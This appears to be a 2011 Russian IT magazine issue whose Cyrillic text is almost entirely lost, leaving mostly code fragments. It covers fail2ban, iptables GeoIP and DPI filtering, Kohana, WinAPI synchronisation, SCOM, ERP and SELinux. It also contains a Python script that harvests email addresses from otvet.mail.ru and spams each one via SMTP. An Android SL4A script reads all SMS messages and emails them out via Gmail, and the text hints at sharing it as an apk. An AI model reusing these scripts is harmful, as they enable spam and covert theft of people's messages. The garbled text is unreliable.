grinder (grinder@tux.in.ua)

iptables
IP-
, .
, , IP . iptables,
.

fail2ban

, ,
,
. ,
Fail2ban (fail2ban.org). : ,
,
. , IP iptables/ipwf
TCP Wrapper (/etc/hosts.allow|deny).
, , ,
. / e-mail. Fail2ban
SSH, ,
,
IP. ,
.
Fail2ban
Linux,
.

.
Ubuntu/Debian :
$ sudo apt-get install fail2ban

, SSH.

098

,
/etc/fail2ban ( Debian/Ubuntu). fail2ban.conf
,
. 0.7,
.
filter.d action.d.
.conf .local. ,
- ,
.conf .
. .
, . , HOST ,
IP :
(?:::f{4,6}:)?(?P<host>[\w\-.^_]+)

, , DDOS- SSH:
$ grep -v '^#' /etc/fail2ban/filter.d/sshd-ddos.conf
[Definition]
failregex = sshd(?:\[\d+\])?: Did not receive identification
string from <HOST>$
ignoreregex =

failregex , . ignoreregex , .
. ,
X 08 /151/ 2011

fail2ban
, .
- fail2ban-regex,
.
, Asterisk
, VoIP ,
:
NOTICE[3309] chan_sip.c: Registration from
'sip:XXX@1.2.3.4' failed for '9.8.7.6' No matching
peer found

:
failregex = NOTICE.* .*: Registration from '.*'
failed for '' No matching peer found

. :
$ fail2ban-regex /var/log/asterisk.log 'NOTICE.* .*:
Registration from '.*' failed for '' No matching
peer found'

,
asterisk.conf, filter.d.
, , . , ,
.
action.d.

DPI
Deep Packet Inspection (
) ,
,
. DPI-
OSI
:
(P2P, VoIP, online-,
, ),
;

(, P2P: BitTorrent, KaZaa,
eDonkey, Gnutella, MP2P, FastTrack);
,
,
(QoS);
(, ,
).

X 08 /151/ 2011

fail2ban

/, , ,
.
Fail2ban, /etc/bail2ban/
jail.conf.
.
$ sudo nano /etc/bail2ban/jail.conf
[DEFAULT]
// IP-, ,
DNS-
ignoreip = 127.0.0.1
// ,

bantime = 600
//
,
maxretry = 3
findtime = 600

HTTP://WWW
links
Fail2ban
fail2ban.org.
OpenDPI
opendpi.org, code.
google.com/p/opendpi.
Xtables-addons
xtables-addons.
sf.net.

[asterisk-iptables]
enabled = true
# filter action


filter = asterisk
action = iptables-allports[name=ASTERISK,
protocol=all]
sendmail-whois[name=ASTERISK, dest=root,
sender=fail2ban@example.org]
# Asterisk
logpath = /var/log/asterisk/messages
#
maxretry = 5
bantime = 6000

, :
$ sudo service iptables start
$ sudo service fail2ban start

Fail2ban , /var/
log/fail2ban.log iptables.

099

UNIXOID

fail2ban iptables

$ sudo iptables -L -v | grep fail2ban

Xtables-addons
patch-o-matic (-ng),
iptables, ,
Xtables-addons (xtables-addons.sf.net).
/ iptables.
,
. ,
CONFIG_NETFILTER_XTABLES :
$ grep -i xtables /boot/config-`uname -r`
CONFIG_NETFILTER_XTABLES=m

, . Ubuntu :
$ sudo apt-cache search xtables-addons

... : ,
.
$ sudo apt-get build-dep xtables-addons-common

, ,
, : ./configure; make; make install.
:
$ lsmod x_tables

.
20 . , ,
, man xtables-addons. .
IP- , ,
, . GeoIP /
. ,
. , /usr/
libexec/xtables-addons ( /usr/lib/xtables-addons). CSV
Perl:
$ cd /usr/libexec/xtables-addons/
$ sudo ./xt_geoip_dl

100

penDPI

$ sudo mkdir /usr/share/xt_geoip


$ sudo apt-get install libtext-csv-xs-perl
$ sudo ./xt_geoip_build -D /usr/share/xt_geoip *.csv

,
'--src-cc' (
), '--dst-cc' (). , iptables -m geoip help.
//
$ sudo iptables -A INPUT -m geoip \
--src-cc CN, TW, KR -j REJECT
//
$ sudo iptables -A INPUT -m geoip \
--src-cc A1 -j REJECT
// SSH
$ sudo iptables -A INPUT -p tcp dport 22 \
-m geoip ! src-cc RU -j REJECT
// ICMP
$ sudo iptables -A OUTPUT -p icmp -m geoip \
dst-cc ES -j REJECT

GeoIP, ,
- :
iptables -A INPUT -p tcp --dport 80 -m geoip \
--src-cc RU -j MARK --set-mark 1

, ,
IP-, .
,
.
TARPIT. : ,
( TCP
).
,
. , . , SSH- , 22. ,
:
$ sudo iptables -A INPUT -p tcp -m tcp \
-dport 22 -j TARPIT

, 22 , .
X 08 /151/ 2011

GeoIP
xtables-addons

$ patch -p0 < ../ipq_protocols.h.diff

:
DELUDE , ,
.
, , TARPIT DELUDE, CHAOS,
DROP ( ), TARPIT, DELUDE REJECT.
,
'--delude'/'--tarpit' /sys/modules/
xt_CHAOS/parameters.
IPP2P ,
, P2P-,
. P2P-, :
$ sudo iptables -A FORWARD -m ipp2p --ipp2p -j DROP

OpenDPI

, ,
. , , ICQ,
. , ,
80. ,
,
. iptables
, L7-filter
IPP2P. , OpenDPI (opendpi.org, code.google.com/p/opendpi).
LGPLv3, OpenDPI
PACE,
Ipoque. , PACE
-.
PACE OpenDPI: P2P, Skype, VoIP, IM,
, ( DPI ).
:

$ export OPENDPI_PATH=$(pwd)

. , (2.6.27-33), OpenDPI
.
. , clck.ru/
DWl8 2.6.35 ( LTS
Ubuntu). CONFIG_
NF_CONNTRACK_EVENTS CONFIG_NF_CT_NETLINK.
. Ubuntu
.config- /boot. . , opendpi-netfilter-wrapper, , :
$ cd ../wrapper
$ patch -p3 < ../opendpi-netfilter-wrapper-1.1_2.6.35_v3.patch
$ make

,
2.6.33. :
$ sudo make modules_install
$ sudo cp ipt/libxt_opendpi.so /lib/xtables

:
$ sudo modprobe xt_opendpi

, :
$ sudo iptables -m opendpi --help

( ipq_protocols_
osdpi.h) :

$ sudo apt-get install make gcc libpcap-dev

opendpi-1.2.0.tar.gz opendpi-netfilterwrapper-1.1.tar.gz,
, :
$
$
$
$
$

tar -xzf opendpi-netfilter-wrapper-1.1.tar.gz


cd opendpi-netfilter-wrapper-1.1
tar -xzf ../opendpi-1.2.0.tar.gz
cd opendpi-1.2.0
patch -p0 < ../ipq_main.h.diff

X 08 /151/ 2011

iptables -A FORWARD -m opendpi --bittorrent -j DROP

, ,
.

,
iptables,
. , , . z

101

CODING
Spider_NET (http://vr-online.ru)

WEB-

Kohana +
MVC = love

, web, ,
. 2011 , -
.

Content Management Framework.
CMF.
?

Content Management Framework (CMF)


(Content Management
System). CMS, ( )
, .
. CMS
, .

CMF

,
. CMF
:
1. . , .
2. . ,
. ,
, .

,
.
3. .
, CMF ( )
. ,
CMF, .

: , ,


. -

102


, .
, .
.
( , , ) .
. .
, , ,
.
.
() .
Model-View-Controller. ,
, , .
, .
,
. , , , Kohana

MVC.

MVC . ,
..

. , http://xakep.ru.
(
MVC). , .

.. .
X 08 /151/ 2011

- .
, , ,
.
.
.

MVC .
. ( ) . ,
, , .
- .
MVC .

- .
, ..

This is Kohana

Kohana . ,
, Kohana
Model View Controller.
Kohana -
PHP.
, Kohana BSD, GPL. ,
X 08 /151/ 2011


http://goo.gl/sRjoo
CodeIgniter. Kohana
. Kohana,
CodeIgniter. ,
.
http://kohanaframework.org/
Kohana. ,

.
.
http://vr-online.ru
. CMF,
CodeIgniter, Drupal
..
http://kerkness.ca/wiki/doku.php
Kohana.


, .

Kohana

DVD
dvd


.

WARNING
warning
,
MVC

.
!


.
. ,
.
Environment Tests ( ).

103

CODING


.
. , .
: Your environment passed all requirements. Remove or rename
the install.php file now.
,
install.php.
. ,
. , hello, world.

Hello world Kohana

, Hello world.
:
<?php defined('SYSPATH') or die('No direct script access.');
class Controller_Test extends Controller {
public function action_index()
{
$this->response->body('Hello world! Hello, everyone!!!');
}
}


Controller_Test, Controller.
. Controller ( ),
.
.
Test. App/
classes/controller App/classes/model.

, ,
. ,
. , ,
myFirstModel:
class Model_myFirstModel extends Model
{
public function calcIt (a, b) {
return a + b;
}
}

calcIt().
.
, ,
. ,
, Model_Database. ,
,
users.
:
class Model_myFirstDBModel extends Database_Model
{
public function selectData() {
return $this -> db -> query('select userName,
pass from users');
}
}

.
, , , .
, .
views,
.
Application. .
about. :
<html>
<head>
<title><?php echo $title ?></title>
</head>
..

,
html-.
, <title>.
. ,
.

:
$about_page = View::factory('about');
$about_page -> title = ' about';
$this -> response -> body ($about_page);

about_page about. View::factory.


title .

.
web. ,
, ..
(-
:) . .), - . ,
. ,
, .
, - .
, ,
. , Dropbox?
2 ,
.
.
, .
, :
.


. , , HTML5
Drag&Drop-
FileAPI.
DropBox. public.
. Dropbox
.
. , ,
.
.

, MVC

104

X 08 /151/ 2011

, , ( ) .
. ,
. ,
. . , ,
( ).
. ,
, .
:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title> CMF Kohana ][</title>
<link href="style.css" rel="stylesheet" type="text/css" />
X 08 /151/ 2011

<script src="html5uploader.js"></script>
</head>
<body onload="new uploader('drop', 'status', 'uploader.php',
'list');">
<div id="box">
<div id="status"> </div>
<div id="drop"></div>
</div>
<div id="list"></div>
</body>
</html>

html5uploader. JS-
html5-
. onload uploader.
:

105

CODING

: ORM
1. id , ;
2. id ;
3. ,
;
4. id .
. ,
html- style.css.
. , css-,
.
, Dropbox.
. . , ,
. .
. ,
DropboxUploader.
.

upload. DropBox :
$uploader = new DropboxUploader('_',
'_');
$uploader->upload(' ', ' ');

public,
/pupblic. ,
'/'.
:
if(count($_FILES)>0)
{
$uploader = new DropboxUploader('login', 'pass');
$uploader->upload(

106

$upload_folder.'/'.$_FILES['upload']['name'],
$dropbox_folder);
if(move_uploaded_file($_FILES['upload']['tmp_name'],
$upload_folder.'/'.$_FILES['upload']['name'] ) )
{
echo 'done';
$uploader = new DropboxUploader('login', 'pass');
$uploader->upload(
$upload_folder.'/'.$_FILES['upload']['name'],
$dropbox_folder);
}
exit();
}
...

$_FILES. ,

sendAsBinary().
base64 ( ). .
.

web ,
.
Kohana
. Kohana . ,

php. . ,
. z
X 08 /151/ 2011

>> coding

CODING
herfleisch (www.perechnev.com)

@MAIL.RU


mail.ru
( , ),
.
,
,
otvet.mail.ru.

.
, . ,
otvet.mail.ru.
-
.
, .
, ,
<ctrl+u> HTML- . , .
, ,

108

- mail-. :
, . ,
gedit .

Python.
. .
email- . urllib
- HTTP re
.
Python-:
X 08 /151/ 2011

INFO

info



100 .
-
,

-.

DVD

email
import urllib
import re

: web,
. :
while True:
u = urllib.urlopen("http://otvet.mail.ru/it/")
page = u.read()
emailPattern =
r"[0-9a-zA-Z_\-\.]+@[0-9a-z-A-Z\.]+.[a-zA-Z]+"
compiledPattern = re.compile(emailPattern)
for address in compiledPattern.findall(page):
# -

http://otvet.mail.ru/it/ ,
. , , email- , http://otvet.mail.ru/sport/.
emailPattern
, email-. ,

. Google

, :).

:
for address in compiledPattern.findall(page):


findall compiledPattern.
page,
. findall
email-,
http://otvet.mail.ru/it/.
, for <> in <>, , email-
X 08 /151/ 2011

, address
. ,
,
.
.
,
:
smtp_server = "smtp.mail.ru"
smtp_port = 25
smtp_address = "nickname@mail.ru"
smtp_password = "passw0rd"
mail_topic = " "
mail_body = ",
-. , ,
."


.
. -
:
import smtplib
from email.MIMEText import MIMEText

dvd


,
.

WARNING
warning



mail.
ru
.

.

forin, email:
msg = MIMEText(mail_body + address, "", "utf-8")
msg['From'] = smtp_address
msg['To'] = address
msg['Subject'] = email_topic
mailServer = smtplib.SMTP(smtp_server, smtp_port)
mailServer.login(smtp_address, smtp_password)
mailServer.sendmail(smtp_address, address,
msg.as_string())
mailServer.close()
usedEmails.append(address)

109

CODING

:)
: email ,
address.
. ,
.


, - .
20-25
. :
time.sleep(25)

:
import time

, .
,
. -

, 150 400 . !
http://otvet.mail.ru ,
.
19 998. 20
:).

, otvet.mail.ru
. ,
Google Yahoo , . , ,
,
email- , .
, ,
.
, - -
: ! , .
, :).
: my.mail.ru.
. , . z

110

X 08 /151/ 2011

>> coding








e1$m 







CODING
Night Storm (nstorm90@gmail.com)

Scripting
Layer
for Android

SMS-
ANDROID

Scripting Layer for Android:



Android
. ,
.
Python Ruby! SL4A .

SL4A
Android. ,
: Python, Perl, JRuby, Lua, BeanShell,
JavaScript, Tcl. API,
Android,
.
,
. ,
, ,
-

112

. ,
. ,
alpha-,
. , ,
cellbots.com.

:
SL4A, - android-
. apk-
(. ), QR.
X 08 /151/ 2011

DVD
dvd


.

HTTP://WWW
links

QR- SL4A

:
http://code.google.
com/p/androidscripting/.

, , Add Python,
py,
:
import android
droid = android.Android()

Python
,
.
.
View Interpreters.
Shell ,
unix-.
,
, Add, . apk-.
Python, .
,
. Python for Android, ,
Install,
,
. , SL4A, ,
Python.
.

Hello world!

, Hello World ,
, .
( View
Interpreters), Python.
, ,
print "Hello world" ,
.

,
exit() .
X 08 /151/ 2011

, , : , ,
droid. :
print Hello world, hello
world alert- API.
:
import android
droid = android.Android()
#
h = "hello world"
print h
# API
droid.dialogCreateAlert(h, h)
droid.dialogShow()

WARNING
warning


,

.


. DialogCreateAlert : .
makeToast (
).

-
, , ! ,
API browser,
. , , <Insert>.

. , , .

SMS-

, SMS
.

113

CODING

, -
# -*- coding: utf-8 -*import android, smtplib, os
droid = android.Android()
#
mailfrom = " "
mailto = " "
lines = ""
#
result = droid.smsGetMessages(False)
#
for f in result[1]:
for value in f.values():
lines = lines+str(value.encode('utf-8'))+ '\n'
print lines
#
mailSend = smtplib.SMTP("smtp.gmail.com",587)
mailSend.ehlo()
mailSend.starttls()
mailSend.ehlo()
mailSend.login(mailfrom," ")
mailSend.sendmail(mailfrom, mailto, lines)
mailSend.close()

, .
. mailfrom
mailto ,
, .
smsGetMessages() .
,

114

Python
(True), (False). ,
, : inbox (
) ,
. result ,
. ,
. result, SMS
,
result[1], ,
SMS, ID .
,
, .
API SL4A sendEmail(),
, ,
SMS . smtplib
.
.
? , ,
,
. apk-
( : http://code.google.com/p/android-scripting/wiki/
SharingScripts), , :).

, API ( )
, . ,

, ! z
X 08 /151/ 2011

CODING
deeonis (deeonis@gmail.com)

C++, . C++ ,
. Windows ,
.
,
.

.
Windows,
(, , ..),
.
, ,
-
.
.
:

//
HANDLE hWorkerThread = ::CreateThread( ... );
// -
,
...
//
DWORD dwWaitResult = ::WaitForSingleObject(
hWorkerThread, INFINITE );
if( dwWaitResult != WAIT_OBJECT_0 )
{
//
}
//
::CloseHandle( hWorkerThread );

CreateThread,
, , , , . , API- WaitForSingleObject. .

WaitForSingleObject
WaitForMultipleObjects

WaitForSingleObject
,
. , .
, , -

116

. : . WaitForSingleObject
, ,
, , ,
.
, API
.
WAIT_TIMEOUT. , INFINITE.
,
, .
, ,
WAIT_OBJECT_0.
WaitForSingleObject , API- WaitForMultipleObjects,
.
.
WaitForMultipleObjects
DWORD WINAPI WaitForMultipleObjects(
__in DWORD nCount,
__in const HANDLE *lpHandles,
__in BOOL bWaitAll,
__in DWORD dwMilliseconds
);

API- WaitForSingleObject ,
.
const
HANDLE *lpHandles. DWORD nCount, BOOL bWaitAll
,
.

WaitForSingleObject, , bWaitAll == FALSE,

WAIT_OBJECT_0 + object_index_in_array. ,
WAIT_OBJECT_0, , .
, , WaitFor***, , .
WaitForMultipleObjects
(Events), , , , , ,
. , X 08 /151/ 2011

MSDN
, .

event . , ,
,
.
CreateEvent.
CreateEvent
HANDLE WINAPI CreateEvent(
__in_opt LPSECURITY_ATTRIBUTES lpEventAttributes,
__in BOOL bManualReset,
__in BOOL bInitialState,
__in_opt LPCTSTR lpName
);

.
BOOL bManualReset
FALSE.
WaitFor***
. bManualReset == TRUE,
ResetEvent.
.

, API OpenEvent.
events .
BOOL bInitialState.
TRUE, .
Events WaitFor***-
.

(mutex) event , ,
,
X 08 /151/ 2011

. ,
, . -
mutex
WaitFor***,
.
,
. , ,
mutex, ,
WaitFor*** , ,
.
,
WaitFor*** API ,
.
ReleaseMutex. mutex
. , ReleaseMutex
,
WaitFor***.
,
,
.
Mutex
HANDLE hMutex;
void Func()
{
::WaitForSingleObject(hMutex, INFINITE);

::ReleaseMutex(hMutex);
}
DWORD WINAPI thread1(LPVOID param)
{
::WaitForSingleObject(hMutex, INFINITE);

HTTP://WWW
links
http://goo.gl/H2NLa
,
Windows,
.

Func();

117

CODING


::ReleaseMutex(hMutex);
}
DWORD WINAPI thread2(LPVOID param)
{
::WaitForSingleObject(hMutex, INFINITE);
...
::ReleaseMutex(hMutex);
}
int main(...)
{
hMutex = ::CreateMutex(NULL, FALSE, NULL);
HANDLE hThread1 = ::CreateThread(NULL, 0, thread1, ...);
HANDLE hThread2 = ::CreateThread(NULL, 0, thread2, ...);
}

thread1 WaitForSingleObject
. ,
WaitForSingleObject,
ReleaseMutex.
WaitFor*** , thread1
, . thread2, ,
.
, WaitForSingleObject
Func ,
,
.

(semaphore)
, . , ,
, semaphore . , WaitFor***-
, .
,
. semaphore API-
CreateSemaphore.

118

CreateSemaphore
HANDLE WINAPI CreateSemaphore(
__in_opt LPSECURITY_ATTRIBUTES lpSemaphoreAttributes,
__in LONG lInitialCount,
__in LONG lMaximumCount,
__in_opt LPCTSTR lpName
);

, ( LONG lMaximumCount)
(LONG
lInitialCount). ReleaseSemaphore ,
,
.
.

critical
section. API, WaitFor***.

.
critical section . API- InitializeCriticalSection.
,
CRITICAL_SECTION (
).
.
EnterCriticalSection CRITICAL_SECTION
, . LeaveCriticalSection
.
API , ,
. , , ,
, 100 .
, .
, EnterCriticalSection
. , X 08 /151/ 2011


( HKEY_LOCAL_
MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\
CriticalSectionTimeout). WINAPI EXCEPTION_POSSIBLE_DEADLOCK,
,
deadlock. , ,
null.
EnterCriticalSection TryEnterCriticalSection,
,
FALSE, critical section.
, , TRUE.
, ,
DeleteCriticalSection.

. , .
API-. API
Interlocked, :).
,
- .
.
,
. ,
,
, CPU .

Deadlock

.
, .
deadlock
DWORD WINAPI thread1(LPVOID param)
{
::WaitForSingleObject(hEventA, INFINITE);
...
X 08 /151/ 2011

::WaitForSingleObject(hEventB, INFINITE);
...
}
DWORD WINAPI thread2(LPVOID param)
{
::WaitForSingleObject(hEventB, INFINITE);
...
::WaitForSingleObject(hEventA, INFINITE);
...
}

, : A B.
,
A B, , ,
event B A. , .
,
WaitForMultipleObjects bWaitAll, TRUE,
A B .
. ,
, WaitForMultipleObjects.

,
. , ,
,
,
.

, , .
. , ,
,
, . z

119

SYN/ACK
grinder (grinder@tux.in.ua)

SCOM:

, . , (
) . , . , ,
.

SCOM

- Microsoft
System Center,
, . SCOM 2007 R2
(OpsMgr, System Center Operations Manager 2007 R2)
2005 (Microsoft Operations Manager).
,
,
Windows, Linux UNIX. SCOM

, . ,
, , , SQL-,
,
.
.
( System Center),
(Management Server).
,
. ,
SCOM ,
. ( RPC)

-.
, ,
10 60 . , (
) .
MS SQL Server (
7 ) (Datawarehouse, 1 ).
(Management
Group),
, workgroup
Windows. MG,
.
OpsMgr
OpsMgr, , (),
.
, PowerShell.
PS- -

120

. ,
System Center Central (systemcentercentral.com).
, ,
. SCOM
(Management Packs), . , , ,
(),
.
. MP
SCOM, .
MS.
MS, . , , SCOM
MS Forefront TMG, System Center Data Protection
Manager 2010 .

.
Management Packs SCOM
( systemcentercentral.com).
,
SNMP , SCOM.
, TechNet .
XML-.
, . XML
, , .
SCOM . (Reporting
Server), , .
OpsMgr
Audit Collection Services (ACS), .
SCOM ,
. SCOM 2007 R2, ,
, ,
Linux/Unix .

SCOM

, , ,
. ,
Next, X 08 /151/ 2011

SCOM 48 Management Pack


SCOM
, .
, , ,
- , OpsMgr Win2k8 ,
(R2 2009 ).
SCOM
(, .
.) .
(CPU
2,8 , RAM 4 ) Win2k3/2k8/R2, MS
SQL Server MS SQL Server (Reporting
Services) .
Web Server (IIS). : SCOM 2007 R2
MS SQL 2008 SP2 R2, SQL
2005 SP2 SQL 2008 SP1.
. DBCreateWizard.exe, . Database
. ,
(. support.microsoft.com/
kb/2425714). , , SQL-
, clck.ru/E17g.
clck.ru/DrGM,
Prerequisite Viewer,
, , .
, ,
IIS .
, , .
PowerShell :
X 08 /151/ 2011

> Import-Module ServerManager


> Add-WindowsFeature NET-Framework-Core,Web-Metabase,
Web-WMI,Web-Static-Content,Web-Default-Doc,Web-DirBrowsing,Web-Http-Errors,Web-Asp-Net,Web-Net-Ext,WebISAPI-Ext,Web-ISAPI-Filter,Web-Filtering,Web-WindowsAuth, Web-Mgmt-Console r

ASP.NET Ajax Extensions.


clck.ru/DwEY .
, WinXP/Vista/7.
Active
Directory ( , DNS, 2000).

Global- ,
.
, .
, OpsMgr, ,
OpsMgr .
,
. , SQL,
.
Management Server Action Account,
SDK and Config Service Account.
-. Windows , ;
- ,
.
. -

121

SYN/ACK

Prerecvisite Viewer
,
, . ,
,
.

(Datawarehouse Reporting Server), ACS ( ).
( 51908).

, .
, , Monitoring, Authoring, Administration,
Reporting My Workspace. .
, , My Workspace. . , .

. -
: Monitoring My Workspace ,
, .
PS ,
Get-OperationManagerCommand. ,
, :
PS> Get-managementServer
.
Monitoring Windows
Computer Operations Manager . Healthy.
.
Monitoring (alerts), , , ,
. , , ,
. Actions .
, .
. Required
Configuration Tasks -

122


.
, ,
.
, Active Directory, Configure Active
Directory (AD) Integration Optional Configuration.
, .

.
SCOM ( ,
..).
, Administration .

,
( ).
, ,
// ,
, , ,
.
Discovery
Wizard. , .
(Windows, Linux
), , (
).
. ( , ..),
, ,
Discovery.
(agent agentless) , , . ,
, ,
Pending Management. , ( ),
Agent Management,
.
60
, , ,
.
X 08 /151/ 2011

HTTP://WWW
links
SCOM
microsoft.com/
opsmgr.

SCOM technet.microsoft.com/opsmgr.
Microsoft,
SCOM
clck.ru/Du0j.
System
Center Central
systemcentercentral.
com.

INFO
SCOM
(Administration
Settings Heartbeat, )
,
(,
, ).
SCOM MS CEIP .
Client Monitoring Configuration,
Management
Server.

,
, ,
.
.
.
, SCOM , ,
. , . 50 ,
Administration
Management Pack.
. MP
,
,
Download Management Pack Import
Management Pack. SCOM
,
,
.
, X 08 /151/ 2011

.
Notifications Channel,
New : email, IM, SMS .
, . , email
SMTP- .
,
New Subscriber, , (
) .
, Subscriptions. , New
. , ,
.
, .

,
. ,
.
,
, ,
:).

,
-.


SCOM,
,
.
, , . z

info


System
Center Essentials.


OpsMgr, ,
System
Center ,
,

.

WARNING
warning
SCOM 2007 R2
SQL
2008 R2, SQL
2005 SP2 SQL 2008
SP1.


SQL- clck.
ru/E17g.

123

SYN/ACK
(polygaev@gmail.com)

ERP
!
ERP-: , OpenSource

ERP , . . , ERP-, .


1. ERP

ERP-

.
. ERP-
, - . , 1
1:
( ),
: ,
, -
. ,
.
1: .
1 20. ,
.
.
, ERP, . ,
ERP- SAP
, , ,
,
(, ..).
, .

( $1 , $100 . $1 , $100 .),
( $500 ,
$100 $500 , $100
) , ERP.
. ERP
.
, .
, , :
ERP.
,
, -

124

ERP-.
, , , . ,
,
. ,
.
. ,
,
.
.

2. ERP

ERP-
, .
2009 ( 2010 ), IDS, ERP-
2.
SAP,
1C, Oracle, Microsoft
.
,
.
, , ERP-, ,
.
,
.

.
.
(. 3), .
,
, , ..

SAP


SAP, - ,
( 18 )
X 08 /151/ 2011

- ERP-
ERP-.
: SAP Business One
SAP Business All-in-One.

SAP Business All-in-One -


, 2500 . SAP
Business One -
, 100 ( ,
).


ERP- SAP
: ,
, , ,
, , , ( ), .
(www.sap.com) ,
(. 4).
, SAP

: SAP SCM , SAP SRM
.


SAP: , , ,
,
, SAP
.

Oracle


-
X 08 /151/ 2011

Oracle.
.
Oracle ,
. , .

ERP- Oracle E-Business Suite. Oracle E-Business Suite .



. 12 .



: , ,
,
, ,
,
, ,
, ,
. , : , ,
-, - ,
.

ERP Oracle
ORACLES PEOPLESOFT ENTERPRISE.
.


ERP- : ,
, ,
,
, , -

125

SYN/ACK

1. ERP

:
SAP:
sap.com/cis/sme/solutions/businessmanagement/comparebm/
index.epx.
Oracle:
oracle.com/ru/products/applications/ebusiness/index.html.
Microsoft
microsoft.com/rus/dynamics/default.mspx.

frontstep.ru/products/SyteLine/InforERPSyteLine.

galaktika.ru.
1C
v8.1c.ru.
TADVISER
tadviser.ru.

. , , ,
, .
, .

Oracle
Oracles JD Edwards Enterprise One.


: , , ,
, ,
, , ,
, ,
, .
.


Oracle, ,
. , ERP
,
,
.

. ,
.
SAP, -

126

. 2. ERP (
IDC)


.

Microsoft


- Microsoft
Microsoft Business Solution.
ERP-
Microsoft , . , .

ERP software-
. Microsoft , ERP-. Microsoft Dynamics AX
Microsoft Dynamics NAV . ,
, , Microsoft Dynamics AX
for Retail. , SAP Oracle Microsoft, , .


, Microsoft
Dynamics AX, 5.


Microsoft Dynamics NAV (.
. 6).


Microsoft
. . , Microsoft
,
SAP Oracle. .

INFOR


, , INFOR.
, Gartner ERP- Infor ERP SyteLine
.


X 08 /151/ 2011

. 3. Garthner ERP
: ,
, ..
.
, (
?), , .

: ,
, , ,
.
,
INFOR: ,
,
.


INFOR
Microsoft.
,
. , .

.
ERP , .


ERP-,
ERP.
.
,
.

ERP- ,
.



ERP- ( ).
ERP- :
(Financial Management
FM), (Human
Capital Management HCM),
(Manufacturing Management MM), X 08 /151/ 2011

. 4. SAP Business
All-in-One .
(Project Management PM),
(Supply Chain Management SCM),
(Supplier Relationship
Management SRM), (Enterprise
Asset Management EAM), (),
(Customer
Relationship Management CRM) .
, , ERP: BI (Business
Intelligence), ,
, , ,
Excel.
:
, , , .


ERP-c
.
, ,
,
1C.

1C

1C . ,
.

. ,
: .
,
.

, 1C small-
middle-.
?


1C:
8 ( 1C). , , ,
SAP Oracle, , , Microsoft Dynamics NAV.

127

SYN/ACK

. 5. Microsoft Dynamics AX

1C ,
.
.

. ,
1C ,
ERP 1C .
?

Open Source

. 6. Microsoft Dynamics NAV

ERP- Open
Source-.
ERP . Open Source
.
,
-,
Open Source . .

, , ,
, ,
, ,
.
ERP-.
, Openbravo workflow . web-, Java.
, Java.

Openbravo ERP

Openbravo ERP- ,
. Open
Source-.
Openbravo Russia, .
web- .


: , ,

128

Openbravo , Linux Ubuntu,


Amazon Web Services.

Compiere


Compiere ERP-
. Compiere Open Source ERP-.
2008 InfoWorld Compiere Bossie
Award ERP-
.
X 08 /151/ 2011

. 7. -

ompiere : (Order Management),
(Procurement), (Material Management),
(Project Management),
(WMS Warehouse Management System),
(Manufacturing), (Cash Management),
( ),
(Performance Analysis), (Customer Relationship Management), (Work-flow Management), - (Web
Store).


Compiere : Community Edition
( ), Standard Edition, Professional Edition, Cloud
Edition ( , ,
). Community
Edition ERP- .


ERP-
, ERP.


:

, .

.

Solaris ERP


Solaris ERP ,

.
ERP.


, : ( , , ),
( ,
, , ,
, , ),
, ,
, , , , , ,
X 08 /151/ 2011

. 8. 1:

, (TASK-Manager).

, ERP-,
, ,
4-5 . , ,
:
1. . ,
ERP-.
, . , , ,
: ,
, , ,
, , .
2. .
3.
, , 7 .
4. 4-5
.
5.
.
6. . .
. , , ,
.
, ERP2.
, , :
1. , ERP-
.
2. , ,
ERP, , , , .
3. , ,
, . ,
, , . z

129

SYN/ACK
(execbit.ru)

SELinux:
!

SELinux ,
Linux , ,
. , , SELinux
, .
SELinux (Security-Enhanced Linux Linux )
.
Linux 2.6.0
Red Hat
Enterprise Linux 4. SELinux , Debian, OpenSUSE Ubuntu, , ,
.
SELinux- RHEL5, IBM,
EAL4 Augmented with ALC_FLR.3,
Trusted
Solaris. SELinux Linux, , ,
, ,
, , , . ,
,
, ( Fedora
SELinux ). .

UNIX , .
, (,
), -
. , -rwxr-xr-x, ,
( ) , , , ,
. ,
UNIX ,
( ) ,
(procfs sysfs). ,
. -, .

,
. , -

130

(cfdisk, )
, ,
,
root. ,
: /
,
.
,
(ioctl)? . -,
Linux
.
, ,
root, . ,
, FTP- 21
, root,
, root, FTP , ,
, . - ! SELinux
,
.

, , ,
,
, , .

,
, , RBAC, MCS .
, ][,
. SELinux
, . SELinux , ? :
1. () (, ..)
, ( ,
,
X 08 /151/ 2011

, SELinux).
2. -
, SELinux.
3. ,
( ),
.
4. ( ),
() , ,
. :
, initrc_t
( ,
), - Apache /usr/sbin/
httpd, httpd_exec_t. ,
SELinux, ()
, initrc_t


SELinux- unconfined_u,
,
,

,
(
SELinux).
,
:
# useradd -Z xguest_u _

,
Linux-:
# semanage login -m -S targeted -s "xguest_u" -r s0 __
default__

SELinux- :
# /usr/sbin/semanage login -l

X 08 /151/ 2011

httpd_exec_t, ,
httpd_t.
Apache, httpd_t.
SELinux, ,
, , httpd_t
, httpd_sys_content_t 80 , Apache
(
). :
? , ,

.
,
( 1,5
, FTP- ). SELinux
, , ,
(, audit2allow
SELinux - audit). ,

.


RBAC

, SELinux ,
,
, (,
,
SELinux). - ,
SELinux ,
.
SELinux,
. ()
, ( ,
): ,
( , _t).
SELinux (
Linux, Linux-
SELinux- unconfined_u) ,
, ,

131

SYN/ACK

SELinux
semanage login -l: c SELinux
, object_r,
system_u, unconfined_u, ,
.
, ,
/, SELinux (
, ).

ps xZ: c
, ,
.
UNIX,
. ,
, ,

,
( , ).
SELinux ,
(, ). Linux-, SELinux,
,
SELinux- . ,
Fedora RHEL (
, ,
) : system_u, system_r
unconfined_u, unconfined_r.
,
, system_u ( system_r)
(, httpd_t), (),
(, httpd_exec_t).
,
. unconfined_u unconfined_r
Linux-.
(
system_u:system_r:login_t),
/ . , ,
system_u:system_r:shell_t
SELinux ( ), PAM-
pam_selinux, SELinux,
( ) unconfine
d_u:unconfined_r:unconfined_t. ,
SELinux , , , ,
. , ,
SELinux-
system_u , ,
,
.
, -

132

SELinux ,
. ,
,
,
. ,
, SELinux.
SELinux, .
1. SELinux . SELinux , .
,
- ,
-
( , ).
2. -Z . , . , :
$ id -Z
$ ps auxZ
$ ls -Z

:
$ find /etc -context '*net_conf_t'

:
# restorecon -v /usr/sbin/httpd

,
:
# matchpathcon -V /var/www/html/*

3. mv ! , ,
, ,
(,
/etc, etc_t,
/var/www/html httpd_sys_content_t).
.
mv ,
(, Apache ,
httpd_sys_content_t).
4. . Fedora RHEL man-, SELinux
X 08 /151/ 2011

semanage port -l: c


SELinux selinuxfs

